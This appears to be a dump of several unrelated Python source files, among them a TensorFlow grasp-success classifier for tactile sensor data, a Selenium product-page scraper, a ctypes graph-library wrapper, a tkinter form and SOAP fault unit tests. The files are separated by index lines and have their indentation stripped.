print s, '->', len(o)
#press_clf = press.NetClf(press_model_file, gpu = write_data_gpu)
press_clf = None#press.NetClf(press_model_file, gpu = write_data_gpu)
for dset_name, names in splits:
ut.write_lines(pj(out_dir, '%s_objects.txt' % dset_name), names)
tf_file = pj(out_dir, '%s.tf' % dset_name)
pk_file = pj(out_dir, '%s.pk' % dset_name)
full_pk_file = pj(out_dir, 'full_%s.pk' % dset_name)
if os.path.exists(tf_file):
os.remove(tf_file)
writer = tf.python_io.TFRecordWriter(tf_file)
split_db_files = ut.flatten(by_name[name] for name in names)
split_db_files = ut.shuffled_with_seed(split_db_files, dset_name)
data = []
for db_file in ut.time_est(split_db_files):
with h5py.File(db_file, 'r') as db:
#print 'keys =', db.keys()
def im(x, crop = False, compress = True):
x = ig.uncompress(x)
x = np.array(x)
if crop:
x = crop_kinect(x)
#ig.show(x)
x = ig.scale(x, (256, 256), 1)
if compress:
x = ig.compress(x)
return x
def depth(x):
x = np.array(x).astype('float32')
x = ig.scale(x, (256, 256), 1)
return x
def parse_ee(x):
names = ['angle_of_EE_at_grasping', 'location_of_EE_at_grasping']
vs = [x[name].value for name in names]
ee = np.concatenate([np.array(v).flatten() for v in vs]).astype('float32')
return ee
label_file = pj(label_path, db_file.split('/')[-1].replace('.hdf5', '.txt'))
if os.path.exists(label_file):
print 'Reading label from file'
is_gripping = bool(ut.read_file(label_file))
else:
is_gripping = int(np.array(db['is_gripping']))
pre, mid, _ = milestone_frames(db)
# Estimate the probability that the robot is initially gripping the object
if 0:
press_a = press_clf.predict(
im(db['/GelSightA_image'].value[mid], compress = False),
im(db['/GelSightA_image'].value[pre], compress = False))
press_b = press_clf.predict(
im(db['/GelSightB_image'].value[mid], compress = False),
im(db['/GelSightB_image'].value[pre], compress = False))
initial_press_prob = 0.5 * (press_a + press_b)
else:
initial_press_prob = np.float32(-1.)
#print initial_press_prob, ig.show(im(db['/GelSightA_image'].value[mid], compress = False))
d = dict(gel0_pre = im(db['/GelSightA_image'].value[pre]),
gel1_pre = im(db['/GelSightB_image'].value[pre]),
gel0_post = im(db['/GelSightA_image'].value[mid]),
gel1_post = im(db['/GelSightB_image'].value[mid]),
im0_pre = im(db['/color_image_KinectA'].value[pre], crop = True),
im0_post = im(db['/color_image_KinectA'].value[mid], crop = True),
im1_pre = im(db['/color_image_KinectB'].value[pre], crop = True),
im1_post = im(db['/color_image_KinectB'].value[mid], crop = True),
depth0_pre = depth(crop_kinect(db['/depth_image_KinectA'].value[pre])),
depth0_post = depth(crop_kinect(db['/depth_image_KinectA'].value[mid])),
initial_press_prob = initial_press_prob,
is_gripping = int(is_gripping),
end_effector = parse_ee(db),
object_name = str(np.array(db['object_name'].value)[0]),
db_file = db_file)
data.append(d)
# for db files
ut.save(full_pk_file, data)
# rebalance data?
if rebalance_data:
by_label = [[], []]
for x in ut.shuffled_with_seed(data, 'rebalance1'):
by_label[x['is_gripping']].append(x)
n = min(map(len, by_label))
print len(data), 'before rebalance'
data = ut.shuffled_with_seed(by_label[0][:n] + by_label[1][:n], 'rebalance2')
print len(data), 'after rebalance'
writer = tf.python_io.TFRecordWriter(tf_file)
for d in data:
fbl = lambda x : tf.train.Feature(bytes_list = tf.train.BytesList(value = [x]))
fl = lambda x : tf.train.Feature(float_list = tf.train.FloatList(value = map(float, x.flatten())))
il = lambda x : tf.train.Feature(int64_list = tf.train.Int64List(value = x))
feat = {'gel0_pre': fbl(d['gel0_pre']),
'gel1_pre': fbl(d['gel1_pre']),
'gel0_post': fbl(d['gel0_post']),
'gel1_post': fbl(d['gel1_post']),
'im0_pre': fbl(d['im0_pre']),
'im0_post': fbl(d['im0_post']),
'im1_pre': fbl(d['im1_pre']),
'im1_post': fbl(d['im1_post']),
'depth0_pre': fl(d['depth0_pre']),
'depth0_post': fl(d['depth0_post']),
'end_effector' : fl(d['end_effector']),
'initial_press_prob' : fl(d['initial_press_prob']),
'is_gripping' : il([d['is_gripping']])}
ex = tf.train.Example(features = tf.train.Features(feature = feat))
writer.write(ex.SerializeToString())
writer.close()
ut.save(pk_file, data)
print dset_name, '->', len(data), 'examples'
def read_example(rec_queue, pr):
reader = tf.TFRecordReader()
k, s = reader.read(rec_queue)
feats = {'is_gripping' : tf.FixedLenFeature([], tf.int64),
'end_effector' : tf.FixedLenFeature([3 + 1], tf.float32)}
if 'gel' in pr.inputs:
feats.update({'gel0_pre' : tf.FixedLenFeature([], dtype=tf.string),
'gel1_pre' : tf.FixedLenFeature([], dtype=tf.string),
'gel0_post' : tf.FixedLenFeature([], dtype=tf.string),
'gel1_post' : tf.FixedLenFeature([], dtype=tf.string)})
if 'im' in pr.inputs:
feats.update({'im0_pre' : tf.FixedLenFeature([], dtype=tf.string),
'im0_post' : tf.FixedLenFeature([], dtype=tf.string)})
if 'depth' in pr.inputs:
feats.update({'depth0_pre' : tf.FixedLenFeature([full_dim*full_dim], dtype=tf.float32),
'depth0_post' : tf.FixedLenFeature([full_dim*full_dim], dtype=tf.float32)})
if 'ee' in pr.inputs:
feats.update({'end_effector' : tf.FixedLenFeature([ee_dim], dtype=tf.float32)})
example = tf.parse_single_example(s, features = feats)
out = {'is_gripping' : example['is_gripping']}
if 'ee' in pr.inputs:
out['ee'] = example['end_effector']
base_names = ['gel', 'im', 'depth']
for base_name in base_names:
if base_name not in pr.inputs:
continue
names = [name for name in im_names if name.startswith(base_name)]
ims = []
for name in names:
im = example[name]
if name.startswith('im') or name.startswith('gel'):
im = tf.image.decode_png(im)
im = tf.cast(im, tf.float32)
im.set_shape((full_dim, full_dim, 3))
elif name.startswith('depth'):
im.set_shape((full_dim*full_dim))
im = tf.reshape(im, (full_dim, full_dim))
im = ed(im, 2)
#im = tf.tile(ed(im, 2), (1, 1, 3))
ims.append(im)
combo = tf.concat(ims, 2)
combo = tf.random_crop(combo, (crop_dim, crop_dim, shape(combo, 2)))
combo = tf.image.random_flip_left_right(combo)
if name.startswith('gel'):
combo = tf.image.random_flip_up_down(combo)
print 'group:'
start = 0
for name, im in zip(names, ims):
out[name] = combo[:, :, start : start + shape(im, -1)]
print name, shape(out[name])
start += shape(im, -1)
return out
def read_data(pr, num_gpus):
if hasattr(pr, 'dset_names'):
tf_files = [pj(pr.dsdir, '%s.tf' % x) for x in pr.dset_names]
else:
tf_files = [pj(pr.dsdir, 'train.tf')]
print 'Tf files:', tf_files
queue = tf.train.string_input_producer(tf_files)
names, vals = ut.unzip(read_example(queue, pr).items())
vals = tf.train.shuffle_batch(vals, batch_size = pr.batch_size,
capacity = 2000, min_after_dequeue = 500)
if len(names) == 1:
vals = [vals]
splits = [{} for x in xrange(num_gpus)]
for k, v in zip(names, vals):
s = tf.split(v, num_gpus)
for i in xrange(num_gpus):
splits[i][k] = s[i]
return splits
def normalize_ims(im):
if type(im) == type(np.array([])):
im = im.astype('float32')
else:
im = tf.cast(im, tf.float32)
return -1. + (2./255) * im
def normalize_depth(depth):
depth = tf.cast(depth, tf.float32)
depth = depth / 1000.
depth = -1. + (depth / 2.)
return depth
def make_model(inputs, pr, train, reuse = False, both_ims = True):
n = normalize_ims
def d(x):
x = normalize_depth(x)
#x = tf.tile(ed(x, 2), (1, 1, 3))
x = tf.tile(x, (1, 1, 1, 3))
return x
with slim.arg_scope(vgg.vgg_arg_scope(False)):
feats = []
if 'gel' in pr.inputs:
if not hasattr(pr, 'gels') or (0 in pr.gels):
print 'Using gel 0'
gel0_pre, gel0_post = n(inputs['gel0_pre']), n(inputs['gel0_post'])
else:
gel0_pre, gel0_post = None, None
if not hasattr(pr, 'gels') or (1 in pr.gels):
print 'Using gel 1'
gel1_pre, gel1_post = n(inputs['gel1_pre']), n(inputs['gel1_post'])
else:
gel1_pre, gel1_post = None, None
if both_ims:
feats.append(vgg.vgg_gel2(
gel0_pre, gel0_post,
gel1_pre, gel1_post,
is_training = train,
num_classes = None,
reuse = reuse,
scope = 'gel_vgg16'))
else:
if gel0_pre is not None:
feats.append(vgg.vgg_16(gel0_post - gel0_pre, num_classes = None,
scope = 'gel_vgg16', is_training = train, reuse = reuse)[0])
if gel1_pre is not None:
feats.append(vgg.vgg_16(gel1_post - gel1_pre, num_classes = None,
scope = 'gel_vgg16', reuse = True, is_training = train)[0])
if 'im' in pr.inputs:
feats.append(vgg.vgg_16(n(inputs['im0_pre']), num_classes = None,
scope = 'im_vgg16', is_training = train, reuse = reuse)[0])
feats.append(vgg.vgg_16(n(inputs['im0_post']), num_classes = None,
scope = 'im_vgg16', reuse = True, is_training = train)[0])
if 'depth' in pr.inputs:
feats.append(vgg.vgg_16(d(inputs['depth0_pre']), num_classes = None,
scope = 'depth_vgg16', is_training = train, reuse = reuse)[0])
feats.append(vgg.vgg_16(d(inputs['depth0_post']), num_classes = None,
scope = 'depth_vgg16', is_training = train, reuse = True)[0])
if 'ee' in pr.inputs:
net = inputs['ee']
net = net / ed(tf.sqrt(tf.reduce_sum(net**2, 1)), 1)
net = slim.fully_connected(net, 4096, scope = 'ee/fc1', reuse = reuse)
net = slim.fully_connected(net, 4096, scope = 'ee/fc2', reuse = reuse)
net = slim.fully_connected(net, 4096, scope = 'ee/fc3', reuse = reuse)
w = tf.get_variable("ee/fc1/w", (4096, 4), tf.float32, tf.truncated_normal_initializer(0., 0.01))
b = tf.get_variable("ee/fc1/b", (4096,), tf.float32, tf.constant_initializer(0))
net = tf.nn.xw_plus_b(net, w, b)
net = tf.nn.relu(net)
feats.append(net)
net = tf.concat(feats, 1)
logits = slim.fully_connected(net, 2, scope = 'logits', activation_fn = None, reuse = reuse)
return logits
def gpu_strs(gpus):
if gpus is not None and np.ndim(gpus) == 0:
gpus = [gpus]
return ['/cpu:0'] if gpus is None else ['/gpu:%d' % x for x in gpus]
def set_gpus(gpus):
if gpus is None:
return ['/cpu:0']
else:
if np.ndim(gpus) == 0:
gpus = [gpus]
os.putenv('CUDA_VISIBLE_DEVICES', ','.join(map(str, gpus)))
gpus = range(len(gpus))
return gpu_strs(gpus)
def average_grads(tower_grads):
average_grads = []
for ii, grad_and_vars in enumerate(zip(*tower_grads)):
grads = []
#print ii, len(grad_and_vars)
for g, v in grad_and_vars:
#print g, v.name
if g is None:
print 'skipping', v.name
continue
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
if len(grads) == 0:
#print 'no grads for', v.name
grad = None
else:
#grad = tf.concat_v2(grads, 0)
grad = tf.concat(grads, 0)
#grad = mean_vals(grad, 0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
# def train_press(pr):
# data = ut.load(pj(pr.dsdir, 'train.pk'))
# xs, ys = [], []
# for ex in data:
# xs.append([ex['initial_press_prob']])
# ys.append(ex['is_gripping'])
# xs = np.array(xs, 'float32')
# ys = np.array(ys, 'int64')
# clf = sklearn.svm.SVC(C = 1., kernel = 'linear')
# clf.fit(xs, ys)
# ut.save(pj(pr.resdir, 'clf.pk'), clf)
def mean_diff(im0, im1):
return np.abs(im1.astype('float32') - im0.astype('float32')).mean()
def example_feats(ex, pr):
feat = []
if 'press' in pr.inputs:
feat.append(ex['initial_press_prob'])
if 'mean-diff' in pr.inputs:
feat.append(mean_diff(ex['gel0_pre'], ex['gel0_post']))
feat.append(mean_diff(ex['gel1_pre'], ex['gel1_post']))
return np.array(feat)
def train_clf(pr):
data = ut.load(pj(pr.dsdir, 'train.pk'))
xs, ys = [], []
for ex in data:
ex = copy.copy(ex)
for k, v in ex.items():
if k.startswith('gel'):
ex[k] = ut.crop_center(ig.uncompress(v), 224)
xs.append(example_feats(ex, pr))
ys.append(ex['is_gripping'])
xs = np.array(xs, 'float32')
ys = np.array(ys, 'int64')
clf = sklearn.pipeline.Pipeline(
[('scale', sklearn.preprocessing.StandardScaler(with_mean = True, with_std = True)),
('svm', sklearn.svm.SVC(C = 1., kernel = 'linear'))])
clf.fit(xs, ys)
ut.save(pj(pr.resdir, 'clf.pk'), clf)
def train(pr, gpus, restore = False, use_reg = True):
print 'Params:'
print pr
gpus = set_gpus(gpus)
ut.mkdir(pr.resdir)
ut.mkdir(pr.dsdir)
ut.mkdir(pr.train_dir)
config = tf.ConfigProto(allow_soft_placement = True)
if ut.hastrue(pr, 'use_clf'):
return train_clf(pr)
with tf.Graph().as_default(), tf.device(gpus[0]), tf.Session(config = config) as sess:
global_step = tf.get_variable('global_step', [], initializer =
tf.constant_initializer(0), trainable = False)
inputs = read_data(pr, len(gpus))
lr = pr.base_lr * pr.lr_gamma**(global_step // pr.step_size)
#opt = tf.train.MomentumOptimizer(lr, 0.9)
if pr.opt_method == 'adam':
opt = tf.train.AdamOptimizer(lr)
elif pr.opt_method == 'momentum':
opt = tf.train.MomentumOptimizer(lr, 0.9)
gpu_grads = []
for gi, gpu in enumerate(gpus):
with tf.device(gpu):
label = inputs[gi]['is_gripping']
logits = make_model(inputs[gi], pr, train = True, reuse = (gi > 0))
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits = logits, labels = label)
loss = tf.reduce_mean(loss)
if use_reg:
reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
print 'Number of regularization losses:', len(reg_losses)
loss = loss + tf.add_n(reg_losses)
eq = tf.equal(tf.argmax(logits, 1), label)
acc = tf.reduce_mean(tf.cast(eq, tf.float32))
gpu_grads.append(opt.compute_gradients(loss))
#train_op = opt.minimize(loss, global_step = global_step)
grads = average_grads(gpu_grads)
train_op = opt.apply_gradients(grads, global_step = global_step)
bn_ups = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print 'Batch norm updates:', len(bn_ups)
train_op = tf.group(train_op, *bn_ups)
sess.run(tf.global_variables_initializer())
var_list = slim.get_variables_to_restore()
exclude = ['Adam', 'beta1_power', 'beta2_power', 'Momentum', 'global_step', 'logits', 'fc8', 'fc6_', 'fc7_', 'conv6']
var_list = [x for x in var_list if \
not any(name in x.name for name in exclude)]
if restore:
tf.train.Saver(var_list).restore(sess, tf.train.latest_checkpoint(pr.train_dir))
else:
#tf.train.Saver(var_list).restore(sess, init_path)
for base in ['im', 'depth', 'gel']:
print 'Restoring:', base
mapping = {}
for v in var_list:
start = '%s_vgg16/' % base
if v.name.startswith(start):
vgg_name = v.name.replace(start, 'vgg_16/')
vgg_name = vgg_name[:-2]
print vgg_name, '->', v.name
mapping[vgg_name] = v
if len(mapping):
tf.train.Saver(mapping).restore(sess, init_path)
#saver = tf.train.Saver()
tf.train.start_queue_runners(sess = sess)
summary_dir = ut.mkdir('../results/summary')
print 'tensorboard --logdir=%s' % summary_dir
sum_writer = tf.summary.FileWriter(summary_dir, sess.graph)
for i in ut.time_est(range(pr.train_iters)):
step = int(sess.run(global_step))
if (step == 10 or step % checkpoint_iters == 0) or step == pr.train_iters - 1:
check_path = pj(ut.mkdir(pr.train_dir), 'net.tf')
print 'Saving:', check_path
vs = slim.get_model_variables()
tf.train.Saver(vs).save(sess, check_path, global_step = global_step)
if step > pr.train_iters:
break
merged = tf.summary.merge_all()
if step % 1 == 0:
[summary] = sess.run([merged])
sum_writer.add_summary(summary, step)
_, lr_val, loss_val, acc_val = sess.run([train_op, lr, loss, acc])
if step % 10 == 0:
print 'Iteration %d,' % step, 'lr = ', lr_val, \
'loss:', moving_avg('loss', loss_val), 'acc:', moving_avg('acc', acc_val)
sys.stdout.flush()
class NetClf:
def __init__(self, pr, model_file, gpu = '/cpu:0'):
self.sess = None
self.pr = pr
self.gpu = gpu
self.model_file = model_file
self.thresh = 0.5
def __del__(self):
self.deinit()
def init(self):
if self.sess is None:
print 'Restoring:',self.model_file
with tf.device(self.gpu):
tf.reset_default_graph()
print self.gpu
tf.Graph().as_default()
self.sess = tf.Session()
s = (crop_dim, crop_dim, 3)
self.gel0_pre = tf.placeholder(tf.uint8, s, name = 'gel0_pre')
self.gel1_pre = tf.placeholder(tf.uint8, s, name = 'gel1_pre')
self.gel0_post = tf.placeholder(tf.uint8, s, name = 'gel0_post')
self.gel1_post = tf.placeholder(tf.uint8, s, name = 'gel1_post')
self.im0_pre = tf.placeholder(tf.uint8, s, name = 'im0_pre')
self.im0_post = tf.placeholder(tf.uint8, s, name = 'im0_post')
self.depth0_pre = tf.placeholder(tf.float32, (crop_dim, crop_dim, 1), name = 'depth0_pre')
self.depth0_post = tf.placeholder(tf.float32, (crop_dim, crop_dim, 1), name = 'depth0_post')
self.ee = tf.placeholder(tf.float32, ee_dim, name = 'ee')
inputs = {k : ed(getattr(self, k), 0) for k in im_names + ['ee']}
# for k, v in inputs.items():
# print k, v.shape
self.logits = make_model(inputs, self.pr, train = False)
tf.train.Saver().restore(self.sess, self.model_file)
tf.get_default_graph().finalize()
def deinit(self):
if self.sess is not None:
self.sess.close()
self.sess = None
def format_im(self, im):
return ig.scale(im, (crop_dim, crop_dim), 1)#.astype('float32')
def predict(self, multiple_crops = False, **kwargs):
self.init()
if multiple_crops:
pass
# inputs = {}
# for k in im_names:
# inputs[getattr(self, k)] = self.format_im(kwargs[k])
# [logits] = self.sess.run([self.logits], inputs)
# p = ut.softmax(logits[0])[1]
else:
inputs = {}
for k in im_names:
inputs[getattr(self, k)] = self.format_im(kwargs[k])
[logits] = self.sess.run([self.logits], inputs)
p = ut.softmax(logits[0])[1]
return (int(p >= 0.5), p)
class SVMClf:
""" A baseline that makes its decision based on whether the GelSight is pressed. """
def __init__(self, pr):
self.pr = pr
self.clf = ut.load(pj(pr.resdir, 'clf.pk'))
self.thresh = 0.
def predict(self, **kwargs):
#d = self.clf.decision_function(np.array([[kwargs['initial_press_prob']]], dtype = 'float32'))
d = self.clf.decision_function(example_feats(kwargs, self.pr)[None])
d = d[0]
return int(d >= 0), d
#def test(pr, gpu, test_on_train = False, center_crop = False):
def test(pr, gpu, test_on_train = False, crop_type = 'center'):
[gpu] = set_gpus([gpu])
if ut.hastrue(pr, 'use_clf'):
net = SVMClf(pr)
else:
#check_path = tf.train.latest_checkpoint(pr.train_dir)
check_path = pj(pr.train_dir, 'net.tf-%d' % pr.model_iter)
print 'Restoring from:', check_path
net = NetClf(pr, check_path, gpu)
if test_on_train:
print 'Testing on train!'
data = ut.load(pj(pr.dsdir, 'train.pk'))
else:
data = ut.load(pj(pr.dsdir, 'test.pk'))
labels, probs, accs, vals = [], [], [], []
for i in xrange(len(data)):
ex = data[i]
label = ex['is_gripping']
def load_im(k, v):
if k.startswith('gel') or k.startswith('im'):
im = ig.uncompress(v)
elif k.startswith('depth'):
#v = np.tile(v, (1, 1, 3))
im = v.astype('float32')
else:
raise RuntimeError()
if crop_type == 'center':
crops = [ut.crop_center(im, 224)]
elif crop_type == 'multi':
crops = []
dh = (im.shape[0] - crop_dim)
num_dim_samples = 3
for y in np.linspace(0, dh, num_dim_samples).astype('l'):
dw = (im.shape[1] - crop_dim)
for x in np.linspace(0, dw, num_dim_samples).astype('l'):
crops.append(im[y : y + crop_dim, x : x + crop_dim])
return ut.shuffled_with_seed(crops, k.split('_')[0] + str(i))
all_inputs = {k : load_im(k, ex[k]) for k in im_names}
ps = []
for j in xrange(len(all_inputs['gel0_pre'])):
inputs = {k : all_inputs[k][j] for k in im_names}
inputs['initial_press_prob'] = ex['initial_press_prob']
inputs['ee'] = ex['end_effector']
_, prob = net.predict(**inputs)
ps.append(prob)
prob = np.mean(ps)
pred = int(prob >= net.thresh)
print prob, pred, label
labels.append(label)
probs.append(prob)
accs.append(pred == label)
print 'running average acc:', np.mean(accs)
vals.append(ut.Struct(
label = label,
prob = prob,
acc = accs[-1],
idx = i,
db_file = ex['db_file'],
object_name = ex['object_name']))
labels = np.array(labels, 'bool')
probs = np.array(probs, 'float32')
accs = np.array(accs)
acc = np.mean(accs)
ap = sklearn.metrics.average_precision_score(labels, probs)
print 'Accuracy:', acc
print 'mAP:', ap
print 'Base rate:', ut.f3(np.array(ut.mapattr(vals).label).astype('float32').mean())
ut.save(pj(pr.resdir, 'eval_results.pk'),
dict(acc = acc, ap = ap,
results = (labels, probs)))
ut.save(pj(pr.resdir, 'eval.pk'), vals)
def color_depth(depth):
depth = depth.astype('float32') / 1000.
#import parula
#return np.uint8(255*ut.apply_cmap(depth, parula.parula_map, 0.5, 1.2))
return ut.clip_rescale_im(depth, 0.4, 1.)
def vis_example(db_file):
with h5py.File(db_file, 'r') as db:
pre, mid, post = milestone_frames(db)
sc = lambda x : ig.scale(x, (600, None))
im_mid = sc(crop_kinect(ig.uncompress(db['color_image_KinectA'][mid])))
im_post = sc(crop_kinect(ig.uncompress(db['color_image_KinectA'][post])))
depth = sc(color_depth(crop_kinect(db['depth_image_KinectA'][mid])))
gel_a_0 = sc(ig.uncompress(db['GelSightA_image'][pre]))
gel_b_0 = sc(ig.uncompress(db['GelSightB_image'][pre]))
gel_a_1 = sc(ig.uncompress(db['GelSightA_image'][mid]))
gel_b_1 = sc(ig.uncompress(db['GelSightB_image'][mid]))
row = ['Color:', im_mid,
'Depth:', depth,
'Gel_A_1:', gel_a_1,
'Gel_B_1:', gel_b_1,
'Gel_A_0:', gel_a_0,
'Gel_B_0:', gel_b_0,
'Im after:', im_post,
'Name:', str(np.array(db['object_name'].value[0])),
'Path:', db_file.split('/')[-1]]
return row
def analyze(pr):
eval_exs = ut.load(pj(pr.resdir, 'eval.pk'))
# accuracy by object
by_name = ut.accum_dict((ex.object_name, ex) for ex in eval_exs)
accs, labels = [], []
for name in by_name:
exs = by_name[name]
accs.append(np.mean(ut.mapattr(exs).acc))
labels.append(np.mean(ut.mapattr(exs).label))
print name, ut.f4(accs[-1]), ut.f4(labels[-1])
print 'Object-averaged accuracy:', ut.f4(np.mean(accs))
print 'Object-averaged base:', ut.f4(np.mean(labels))
chosen = set()
table = []
for ex in sorted(exs, key = lambda x : x.prob)[::-1]:
if ex.object_name not in chosen:
chosen.add(ex.object_name)
print ex.object_name
row = vis_example(ex.db_file)
row = ['Prob:', ex.prob, 'Label:', ex.label] + row
table.append(row)
ig.show(table, rows_per_page = 25)
def show_db(pr, num_sample = None, num_per_object = 5):
db_files = ut.read_lines(pj(pr.dsdir, 'db_files.txt'))
db_files = ut.shuffled_with_seed(db_files)
counts = {}
db_files = ut.parfilter(db_ok, db_files)
names = ut.parmap(name_from_file, db_files)
table = []
for name, db_file in zip(names, db_files[:num_sample]):
if counts.get(name, 0) < num_per_object:
counts[name] = 1 + counts.get(name, 0)
row = vis_example(db_file)
table.append(row)
ig.show(table)
def get_object_names(pr):
names = set()
for x in ut.read_lines(pj(pr.dsdir, 'all_db_files.txt')):
try:
names.add(name_from_file(x))
except:
print 'Skipping:', x
print '\n'.join(sorted(names))
def run(pr, todo = 'all',
gpu = 0, restore = 0):
todo = ut.make_todo(todo, 'im train test')
if 'im' in todo:
write_data(pr.dsdir)
if 'train' in todo:
train(pr, gpu, restore = restore)
if 'test' in todo:
test(pr, gpu)
|
412025
|
import pandas as pd
from selenium import webdriver
import csv
CHROME_DRIVER_PATH = '/Users/jiwoo/Documents/chromedriver'
FILE_PATH = 'products.csv'
def crawler(keyword):
url = 'http://www.lottemart.com/search/search.do?searchTerm='
url = url + keyword
driver = webdriver.Chrome(CHROME_DRIVER_PATH)
driver.get(url)
df = pd.read_csv(FILE_PATH)
with open(FILE_PATH, 'a') as f:
f.write('\n')
while(1):
try:
product_list = driver.find_elements_by_xpath('//*[@class="product-article"][@data-panel="product"]/div/a')
for product in product_list:
product_code = product.get_attribute("data-prod-cd")
product_name = product.find_element_by_xpath('.//img').get_attribute("alt")
print(product_name, product_code)
df['바코드'] = product_code
df['제품명'] = product_name
df.to_csv(FILE_PATH, mode='a', header=False, line_terminator='\n', index=False)
# click the "next page" link
next_btn = driver.find_element_by_xpath('//a[@class="page-next"]')
next_btn.send_keys("\n")  # send Enter to the link
except KeyboardInterrupt:
break
except Exception:
break
driver.close()
if __name__ == "__main__":
crawler("남양")
|
412035
|
import ctypes
import networkx as nx
import numpy as np
import os
import sys
class LearningLib(object):
def __init__(self, args):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.lib = ctypes.CDLL('%s/build/dll/learning_lib.so' % dir_path)
self.lib.Fit.restype = ctypes.c_double
self.lib.GetSol.restype = ctypes.c_double
self.lib.GetResult.restype = ctypes.c_double
arr = (ctypes.c_char_p * len(args))()
arr[:] = [x.encode('utf8') for x in args]
self.lib.Init(len(args), arr)
self.ngraph_train = 0
self.ngraph_test = 0
def __CtypeNetworkX(self, g):
edges = list(g.edges(data='weight', default=1))
#print(len(edges))
#print(len(g.nodes))
sys.stdout.flush()
e_list_from = (ctypes.c_int * len(edges))()
e_list_to = (ctypes.c_int * len(edges))()
weights = (ctypes.c_double * len(edges))()
if len(edges):
a, b, c = zip(*edges)
e_list_from[:] = a
e_list_to[:] = b
weights[:] = c
return (len(g.nodes()), len(edges), ctypes.cast(e_list_from, ctypes.c_void_p), ctypes.cast(e_list_to, ctypes.c_void_p), ctypes.cast(weights, ctypes.c_void_p))
def TakeSnapshot(self):
self.lib.UpdateSnapshot()
def ClearTrainGraphs(self):
self.ngraph_train = 0
self.lib.ClearTrainGraphs()
def InsertGraph(self, g, is_test):
n_nodes, n_edges, e_froms, e_tos, weights = self.__CtypeNetworkX(g)
if is_test:
t = self.ngraph_test
self.ngraph_test += 1
else:
t = self.ngraph_train
self.ngraph_train += 1
self.lib.InsertGraph(is_test, t, n_nodes, n_edges, e_froms, e_tos, weights)
def LoadModel(self, path_to_model):
self.lib.LoadModel(ctypes.c_char_p(path_to_model.encode('utf8')))
def SaveModel(self, path_to_model):
self.lib.SaveModel(ctypes.c_char_p(path_to_model.encode('utf8')))
def GetSol(self, gid, maxn):
sol = (ctypes.c_int * (maxn + 11))()
val = self.lib.GetSol(gid, sol)
return val, sol
def GetResult(self, gid):
sol = (ctypes.c_int * 100)()
val = self.lib.GetResult(gid, sol)
return val, sol
if __name__ == '__main__':
f = LearningLib(sys.argv)
|
412058
|
from . import BaseCommand
from flask import send_from_directory
import os
class ResourceRequestCommand(BaseCommand):
def process(self, request, filename, db_session):
return send_from_directory(
os.path.abspath(
os.path.join(os.path.dirname(__file__), "..")
) + '/static',
filename
)
def newInstance():
return ResourceRequestCommand()
|
412088
|
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
from echomesh.base import Settings
from echomesh.base import GetPrefix
from echomesh.expression import Expression
from echomesh.util.thread import Lock
class _Client(object):
def __init__(self):
self.clients = {}
self.lock = Lock.Lock()
Settings.add_client(self)
def get(self, *path):
with self.lock:
value = self.clients.get(path)
if not value:
value = Expression.convert(Settings.get(*path))
self.clients[path] = value
return value
def settings_update(self, get):
with self.lock:
for path in self.clients.keys():
self.clients[path] = Expression.convert(Settings.get(*path))
_CLIENT = _Client()
get = _CLIENT.get
|
412107
|
from tkinter import *
from tkinter import font
info = [
("Name (TEXT):",1),
("e-mail (TEXT):",2),
("Flat no. (TEXT):",3),
("Tower no. (TEXT):",4),
("Area (NUMBER):",5),
("Parking (TEXT):",6),
("Recpt. Fess (NUMBER):",7),
("Address (TEXT):",8),
("Contact number (TEXT):",9)
]
e=["","","","","","","","","",""] # entries
class Page(Frame):
"""Page is the Frame that will be added/removed at will"""
def __init__(self, root, id):
Frame.__init__(self, root)
Label(self, text="Frame %d" % id).pack()
class insert(Frame):
"""Main application where everything is done"""
def __init__(self, root):
Frame.__init__(self, root)
self.root = root
for data,num in info:
self.row = Frame(root)  # one row frame per form field
self.lab = Label(self.row, width=25, padx=10, pady=10, text=data, font=font.Font(family='Helvetica', size=12, weight='bold'), anchor='w')
self.ent = Entry(self.row)
e[num] = self.ent
self.row.pack(side=TOP, fill=X, padx=5, pady=5)
self.lab.pack(side=LEFT)
self.ent.pack(side=RIGHT, expand=YES, fill=X)
Button(self, text='Show'#, command=CommandsGUI.show_entry_fields
).pack(side=LEFT, padx=5, pady=5)
Button(self, text='Insert to database'#, command=DBOperations.insert_into_db
).pack(side=LEFT, padx=5, pady=5)
Button(self, text='Reset'#, command=DBOperations.reset_val
).pack(side=RIGHT, padx=5, pady=5)
Button(self, text="Next", command=self.next).pack(side=BOTTOM)
def next(self):
"""changes the current page. I've only done next here, but you could
do backwards, skip pages, etc"""
self.pages[self.page].pack_forget() #remove the current page
self.page += 1
if self.page >= 5: #checking haven't gone past the end of self.page
self.page = 0
self.pages[self.page].pack(side=TOP) #add the next one
if __name__ == "__main__":
root = Tk()
app = insert(root)
app.pack()
root.mainloop()
|
412114
|
import os
from pathlib import Path
from xml.etree import ElementTree
from unittest import TestCase
import utilities.file_utilities as file_utilities
from mhs_common.messages.soap_fault_envelope import SOAPFault
class TestSOAPFault(TestCase):
message_dir = Path(os.path.dirname(os.path.abspath(__file__))) / 'test_messages'
def test_is_soap_empty(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_empty.xml' )
self.assertTrue(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_is_soap_negative(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'ebxml_header.xml')
self.assertFalse(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_soap_fault_single(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_single_error.xml')
self.assertTrue(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_soap_fault_multiple(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_multiple_errors.xml')
self.assertTrue(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_soap_fault_empty(self):
self.assertFalse(SOAPFault.is_soap_fault(None))
def test_from_string_single(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_single_error.xml')
fault: SOAPFault = SOAPFault.from_string({}, message)
self.assertEqual(fault.fault_code, 'SOAP:Server')
self.assertEqual(fault.fault_string, 'Application Exception')
